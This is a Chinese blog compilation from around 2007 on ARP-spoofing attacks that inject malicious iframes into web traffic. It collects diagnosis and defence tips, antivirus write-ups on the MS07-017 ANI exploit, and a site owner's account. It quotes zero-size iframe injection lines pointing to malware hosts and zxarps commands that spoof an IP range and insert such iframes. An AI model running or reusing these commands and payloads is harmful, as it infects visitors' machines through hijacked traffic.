通过ARP欺骗服务器向IIS挂马

风清扬斈 14年前 (2007-11-19) 信息科技 6760 0
什么是ARP?
ARP(AddressResolutionProtocol)地址解析协议用于将计算机的网络IP地址转化为物理MAC地址。ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的顺利进行。 
ARP病毒的危害性?
当局域网内某台主机感染了ARP病毒后,病毒伪装网关IP-MAC信息,欺骗局域网内其他主机,从而拦截发往网关的数据,导致网络时断时续。 
ARP病毒的危害性极大,严重的将导致局域网内的用户隐私保密信息外泄,例如:用户名、密码、聊天记录、邮件内容等私密信息。 
局域网分析
http://www.elrs.cn E路人生
       一 局域网内某台主机感染了ARP病毒时,会向本局域网内(指某一网段,比如:192.168.28.0这一段)所有主机发送ARP欺骗攻击,让原本流向网络中心的流量改道流向病毒主机,并通过病毒主机代理上网。因客户端具有防代理功能,造成受害者无法通过病毒主机上网。

   由于病毒发作时发出大量数据包会将网络拥塞,大家会感觉上网速度越来越慢。中毒者同样如此,受其自身处理能力的限制,感觉运行速度很慢时,可能会采取重新启动或其他措施。此时病毒短时间停止工作,大家会感到网络恢复正常。如此反复,就造成网络时断时续。

         二 局域网内有某些用户使用了ARP欺骗程序(如:网络执法官、网络剪刀手、传奇木马、QQ盗号软件等)发送ARP欺骗数据包,致使被攻击的电脑出现突然不能上网,过一段时间又能上网,反复掉线的现象。

 

二、故障诊断

如果用户发现以上疑似情况,可以通过如下操作进行诊断:

点击"开始"按钮->选择"运行"->输入"arp -d"->点击"确定"按钮,然后重新尝试上网,如果能恢复正常,则说明此次掉线可能是受ARP欺骗所致。

注:"arp -d"命令用于清除并重建本机arp表。"arp -d"命令并不能抵御ARP欺骗,执行后仍有可能再次遭受ARP攻击。

原理: 
目的:通过arp欺骗来直接挂马 
对服务器其下网站插入类似: 
<iframe src=http://www.***.cn/*.htm width=0 height=0></iframe>
优点:可以直接通过arp欺骗来挂马. 
通常的arp欺骗的攻击方式是在同一vlan下,控制一台主机来监听密码,或者结合ssh中间人攻击来监听ssh1的密码 
但这样存在局限性: 
1.管理员经常不登陆,那么要很久才能监听到密码 
2.目标主机只开放了80端口,和一个管理端口,且80上只有静态页面,那么很难利用.而管理端口,如果是3389终端,或者是ssh2,那么非常难监听到密码. 
优点:1.可以不用获得目标主机的权限就可以直接在上面挂马 
2.非常隐蔽,不改动任何目标主机的页面或者是配置,在网络传输的过程中间直接插入挂马的语句. 
3.可以最大化的利用arp欺骗,从而只要获取一台同一vlan下主机的控制权,就可以最大化战果. 
原理:arp中间人攻击,实际上相当于做了一次代理。 
正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机
arp中间人攻击时候: A---->C---->B 
B---->C---->A 
实际上,C在这里做了一次代理的作用 
那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如 <iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了. 
在所有网页中查找类似 
<iframe src="http://..." width=0 height=0></iframe> 
的代码,全部删掉。如果你是动态网页,比如动网论坛,有些代码在数据库里,需要进库里改。 
治本: 
如果你的服务器是虚空间,要治本只能找虚空间的管理员。如果是自己管理的服务器,可以参照下面的办法—— (以下说的是Windows服务器的): 
1、赶紧改系统管理员administrator的密码,另建一个管理员账号。密码都尽量设得复杂一点。 
2、删除除了上述两个管理员账号及Web服务器用的IUSR_?和IWAM_?外的其它账号 
3、服务器上安装杀毒软件,升级到最新版本,全面杀毒杀马。注意停止服务器上所有无关的服务和驱动。其中有一些没有公司签名的,可能就是病毒的。关于怎么彻底清理病毒和木马,这里就不详细说明了。 
4、用Windows Update补齐所有系统补丁。 
5、如果是XP或2003系统,启用自带的防火墙,将除了80端口和你远程登陆端口外的所有端口,禁止ICMP访问。 
6、如果你的网站有动态网页,数据库用的是MS SQL, 需要特别注意防止SQL Injection,要点如下(更详细的请自行查数据): 
a 将MS SQL Server的xp_cmdshell扩展存储删掉 
b 减小你动态网页中连接数据库的那个账号在数据库系统中的访问权限 
c 仔细检查你的每个动态网页,确保每个输入(包括URL中的参数)都进行了检查,过滤掉了「’-;」等非法字符 
如果是access数据库,要防止access库文件被人下载更换再传上来。 
7、修改你数据库中各主要账号的密码。比如sa 动态网页的连接账号等 
8、注意IIS的安全配置 
a 删掉IIS安装时那个缺省网站,删掉pinters等虚拟目录 
b 停止IIS带你ftp和smtp 
c 配置较详细的日志记录 
d 禁用脚本调试和向客户端发送详细调试信息 
9、注意你用于文件上传的ftp服务器的安全(查看你所用ftp服务器的有关安全资料) 
饱受ARP攻击和挂马网页自动下载木马之苦的朋友们进来看
    “木马猛于虎也”,这句话用在现在的网民(包括我这样的老菜鸟)身上真是再贴切不过了,经常发现有程序会自动下载病毒和木马程序,却无可奈何,或者经常遇到ARP攻击也束手无策。不过最近在浏览金山毒霸工作人员铁军的博客时候却有了可喜发现,好东西要分享给大家o(∩_∩)o…,请大家看下面的内容,有些长,但是绝对有效,看完了别忘了顶帖哦o(∩_∩)o 

下面的内容是在金山毒霸的铁军的blog里面摘抄的,对ARP病毒攻击和Risk.exploit.ani病毒的处理给了很好的解决建议,我转载出来大家参考下: 

最近用户咨询Risk.exploit.ani病毒的问题比较多,该病毒是利用微软MS07-017中的动态光标处理漏洞的畸形ANI文件, 被某些已经挂载木马的网页自动下载。当用户的浏览器打开带有相关恶意代码的网页,将畸形ANI文件下载到本机临时文件夹中时,这时,毒霸的实时防毒和网页监控会进行报警,由于该文件被IE占用,所以某些情况下毒霸是无法立即删除的。但是毒霸已经专门针对此病毒进行了免疫处理,用户即时没有安装相关漏洞补丁,只要启用毒霸监控,也不会中毒。并且,针对这些文件,毒霸还进行了延迟删除处理,在下次重启系统时,这些被锁定的文件会被自动,下载的畸形ANI文件将不起作用,也就不会通过ANI漏洞去下载真正的病毒木马了。 

有两种情况,需要注意: 

1.对于病毒本身而言,清除是简单的,关闭浏览器,然后清空IE临时文件夹,补丁编号MS07-017 KB912919,详细情况见http://www.microsoft.com/technet/security/bulletin/ms07-017.mspx ,如果是本机感染病毒,可以根据日志提取样本。 

2.局域网其他计算机感染病毒进行会话劫持攻击,最近的咨询也比较多,上面的处理方法就无效了。因为病毒本来不一定在当前这台客户机上。某些病毒或者木马利用ARP欺骗等手段,在用户收到的网络数据包中自动插入i-frame-X代码,代码指向利用MS07-017漏洞的网址。使得中毒用户,以及局域网中受到此中毒电脑的欺骗攻击的用户,在上任意网站的时候都会提示存在该病毒。通俗点说,就是局域网某个计算机感染病毒或者木马,该病毒发送arp欺骗,然后在所有的网页访问的tcp数据中插入一段i-frame-X代码,只要网内的计算机通过网关上网,所有的网页都会跳转到i-frame-X制定的网页,该网页是存在畸形ANI文件,所以毒霸会不断的报警。显示的Risk.exploit.ani只不过是一种表现,就像木马下载器和木马,其原理和功能有天壤之别。对于该类情况,也比较容易判断,如果是局域网用户,一般其他的电脑也存在该问题,而且是访问任意网站都会存在该提示。由于不是本机感染病毒,所有对该计算机进行杀毒,扫描提取样本可能都是无效的。用户需要找到的是发送arp欺骗,从而导致出现该现象的机器,这个需要网管抓包来分析,用户个人是无法完成的。当然无论如何,首要解决的是安装补丁。而对于第二种情况,也就是现在局域网中感染ARP 病毒的情况,由于此种现象目前非常普遍,清理和防范都比较困难,给不少的网络管理员造成了很多的困扰。下面就是处理这个病毒的一些参考方法,供大家参考: 

ARP 病毒的症状: 

有时候无法正常上网,有时候有好了,包括访问网上邻居也是如此,拷贝文件无法完成,出现错误;局域网内的ARP 包爆增,使用Arp 查询的时候会发现不正常的Mac 地址,或者是错误的Mac 地址对应,还有就是一个Mac 地址对应多个IP 的情况也会有出现。 

ARP 攻击的原理: 

ARP 欺骗攻击的包一般有以下两个特点,满足之一可视为攻击包报警:第一以太网数据包头的源地址、目标地址和ARP 数据包的协议地址不匹配。或者,ARP数据包的发送和目标地址不在自己网络网卡MAC 数据库内,或者与自己网络MAC 数据库MAC/IP 不匹配。这些统统第一时间报警,查这些数据包(以太网数据包)的源地址(也有可能伪造),就大致知道那台机器在发起攻击了。现在有网络管理工具比如网络执法官、P2P 终结者也会使用同样的方式来伪装成网关,欺骗客户端对网关的访问,也就是会获取发到网关的流量,从而实现网络流量管理和网络监控等功能,同时也会对网络管理带来潜在的危害,就是可以很容易的获取用户的密码等相关信息。 

处理办法: 

通用的处理流程: 

1 .先保证网络正常运行 

方法一:编辑个***.bat 文件内容如下: 

arp.exe s 

**.**.**.**(网关ip) **** 

** 

** 

** 

**( 

网关mac 地址) 

end 

让网络用户点击就可以了! 

办法二:编辑一个注册表问题,键值如下: 

Windows Registry Editor Version 5.00 

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] 

"mac"="arp s 

网关IP 地址网关Mac 地址" 

然后保存成Reg 文件以后在每个客户端上点击导入注册表。 

2 找到感染ARP 病毒的机器。 

a:在电脑上ping 一下网关的IP 地址,然后使用ARP -a 的命令看得到的网关对应的MAC 地址是否与实际情况相符,如不符,可去查找与该MAC 地址对应的电脑。 

b:使用抓包工具,分析所得到的ARP 数据报。有些ARP 病毒是会把通往网关的路径指向自己,有些是发出虚假ARP 回应包来混淆网络通信。第一种处理比较容易,第二种处理比较困难,如果杀毒软件不能正确识别病毒的话,往往需要手工查找感染病毒的电脑和手工处理病毒,比较困难。 

c:使用mac 地址扫描工具,nbtscan 扫描全网段IP 地址和MAC 地址对应表,有助于判断感染ARP 病毒对应MAC 地址和IP 地址。 

预防措施: 

1,及时升级客户端的操作系统和应用程式补丁; 

2,安装和更新杀毒软件。 

4,如果网络规模较少,尽量使用手动指定IP 设置,而不是使用DHCP 来分配IP 地址。 

5,如果交换机支持,在交换机上绑定MAC 地址与IP 地址。(不过这个实在不是好主意) 

还有,使用金山毒霸的朋友要升级病毒库,可以很好的进行防范;此外也可以下载金山专杀工具,进行病毒的扫描查杀,效果也不错,最主要的工具是免费的,呵呵。可以来这里下载相应的工具:http://www.duba.net/default.shtml 

Ps:我不是金山的枪手,但是我愿意去做金山毒霸的宣传者,金山毒霸其实一直在真正为用户着想,去努力,这种精神和态度是值得肯定的。至少看他们的文章和博客还是很让我感动的,呵呵 

 

------------------------------------------------------------------------------------------------

服务器被ARP攻击,网站被挂马
  今天凌晨一打开自己的网站,卡巴就弹出来说有病毒,报告为“恶意程序 Exploit.Win32.IMG-ANI.k 文件: F:Documents and Settings*****Local SettingsTemporary Internet FilesContent.IE5DF7VHPOElove[1].jpg”,然后网页显示的也有问题,最上方居然裸露出来了一小段源码,于是马上查看源码,发现代码居然被改了。

  最上面变成了:

  <iframe src=’httP://web.21575.com/113/’ height=0 width=150></iframe>

  我的第一反应就是网站被人挂马了,首先想到的是不是程序有漏洞,被人传了木马,赶紧用FTP连上,检查ASP文件,发现所有的ASP文件都没有是今天修改过的,模板系统也没有问题,这下我真的不知道怎么办了。都搞不清楚问题出在哪里。。。。

  然后我对挂马的这个网站来了兴趣,在百度里一搜“21575”,

  http://www.baidu.com/s?word=domain:21575&ie=gb2312&ct=0

  发现有一条的结果的标题是“服务器被ARP欺骗,大家请不要访问我的站”,看了一下那条帖子,然后又联想到昨天下午收到了IDC的短信,提醒说最近ARP病毒泛滥,于是我马上就想到应该是受到ARP攻击了。

  下午我还去IDC的网站上看了一下,有一篇关于防范ARP攻击的公告,还提供了ARP防范工具下载,赶紧下了,然后安装。

  这个软件是ARP防火墙(Anti ARP Sniffer),下载地址:http://www.antiarp.com/newsopen2.asp?ArticleID=24

  官网:http://www.antiarp.com/

  刚装上以后ARP防火墙启动不了,于是重启服务器,顺利启动了,然后就看到ARP防火墙提示受到ARP攻击了,还能跟踪到攻击的来源IP。

  装上ARP防火墙以后,再访问网站,一切正常。

  MUD,看来ARP攻击才是最高明的攻击方法嘛,MUD!

  ARP攻击的先进性就好比DNS劫持一样,处于最上层。网页实际的文件并没有改变,但是发送给浏览器以后就变了样了,被病毒给改了。

  相关知识:

  ARP即Address Resolution Protocol,将网络IP地址映射至网卡硬件MAC地址的协议。一般危害为欺骗同网段内的其他服务器地址,截获其数据报文、监听数据传输、盗取帐号信息,甚至对来访数据包进行欺骗和伪造。该病毒发作方式为:网段内一台服务器中此病毒,病毒将以此机器作为肉鸡,对同网段服务器进行数据劫持和欺骗。类似于夺取同段内的其他服务器的IP,导致合法服务器无法正常通讯。此病毒还可对网关地址进行欺骗,造成此网段所有IP地址都无法正常解析。以致网络大面积瘫痪。

  我这次的情形就是上面说的“对来访数据包进行欺骗和伪造”、“对同网段服务器进行数据劫持和欺骗”,ARP防火墙查到了攻击源,是同网段内的一台机子,我看了一下那台机子,居然是用IIS的默认站点建的站(可以直接用IP访问),估计系统漏洞不少,被人攻击中毒了,然后连累到我们同网段内的其他无辜的用户。

  安全很重要!尤其是在最近病毒木马泛滥的日子里。

 

------------------------------------------------------------------------------------------------

ARP攻击,恶意代码写入网络数据包
之前我们发表过一篇日志小心恶意网址a.d3a.us,今天上午发布了其中病毒的解决方案,下午的时候我们发现在这个病毒下载的其它恶意程序里有使用ARP欺骗方式“挂马”的恶意程序。

利用的工具是zxarps,Build 01/17/2007 By LZX(还挺新的,要尽早扼制才行)。病毒一边不断地清ARP表(arp.exe -d),一边向指定IP段指定端口发送攻击命令:
zxarps -idx 0 -ip xxx.xxx.xxx.xxx-xxx.xxx.xxx.xxx -reset
zxarps -idx 0 -ip xxx.xxx.xxx.xxx-xxx.xxx.xxx.xxx -port 80 -insert "<iframe src=http://a.d3a.us/1/ width=0 height=0 frameborder="0"></iframe>"
欺骗指定IP段内的客户端,插入恶意代码到数据包中,然后返回给被欺骗客户端,客户端浏览网页时感觉就像网站被挂马一样。如果被这ARP欺骗攻击导致局域网内多台机器都中了这个东西,想象这个局域网会乱到什么程度,清除起来也不会很方便了吧。

附一点说明:
引用
  -idx [index]    网卡索引号
  -ip [ip]       欺骗的IP,用’-’指定范围,’,’隔开
  -port [port]      关注的端口,用’-’指定范围,’,’隔开,没指定默认关注所有端口
  -reset       恢复目标机的ARP表
  -insert [html code]  指定要插入html代码
“挂马”的方式方法越来越多,继修改网页文件流行后,这种“ARP挂马”也跃跃欲试,局域网啊!

而且而且,现在的病毒和木马群分工越发明确,比如某邮件蠕虫,附在邮件附件里的是downloader,down下来的有专门负责发送邮件的、有专门负责收集地址的、有专门检查自己更新的、还有专门进行DDoS的;木马群也是这样,一个恶意网站down一个木马,它再down一堆其它木马,有盗Q的、有盗网游的、有专门发尾巴的,还有专杀反病毒软件清道的,还有还有……专门负责广告推广的!唉,互联网啊!

------------------------------------------------------------------------------------------------

又见 ARP 攻击会话劫持挂马的黑客程序  


病毒详细信息 

病毒全名 Win32.Hack.ArpSpoon.h 

病毒长度 26112 

威胁级别 ★★ 

病毒类型 黑客程序 


病毒简介 

这是一个ARP欺骗病毒,它能向同网段所有计算机发送ARP欺骗数据包,挟持了该网段内的网关,使经过网关的每个数据包都经过受病毒感染的计算机,该计算机会寻找HTTP响应包,在包内加入挂马的代码。 


技术细节 

1、ARP欺骗 

病毒会枚举本计算机所在的网段,并发送经过伪造的ARP(Address Resolution Protocol)数据包,挟持了本网段的网关地址,使本网段的所有的数据包都经过该计算机。 


2、修改特定数据包 

病毒会对所有的数据包进行分析,过滤出HTTP应答包,并在包里面插入一段代码,使用户看到的网页最前面被插入以上代码,该网页会利用ANI漏洞(MS07-017)下载并运行木马程序,建议用户及时补上计算机上已知的漏洞。 


注: 

利用ARP欺骗挂木马并没有真正的修改网页服务器上的页面内容,它是在数据包传输中非法修改里面的数据,强行插入病毒代码,而且影响范围相当的广,若一个空间服务商的一台服务器中毒,就会使得该服务器所在的网段的传输的数据包都被修改,很可能会影响到数以百计的网站空间。而且寻找ARP欺骗的源头并不容易查出,所以这种攻击方式具有极大的危害性。建议网络管理员使用静态的路由表来管理网络的MAC与IP地址。
 


------------------------------------------------------------------------------------------------

现在知道了解决办法:

设置静态网关和局域网内机器的IP及MAC地址绑定,我做了一个Bat文件,如下:

Anti-ARP.bat
arp -d
arp -s 192.168.0.1 00-01-02-03-04-35
arp -s 192.168.0.2 00-11-0a-11-23-45
arp -a
pause

arp欺骗WEB服务器挂马.rar"

相关推荐

  • 网友评论

    • (*)

    最新评论

    搜索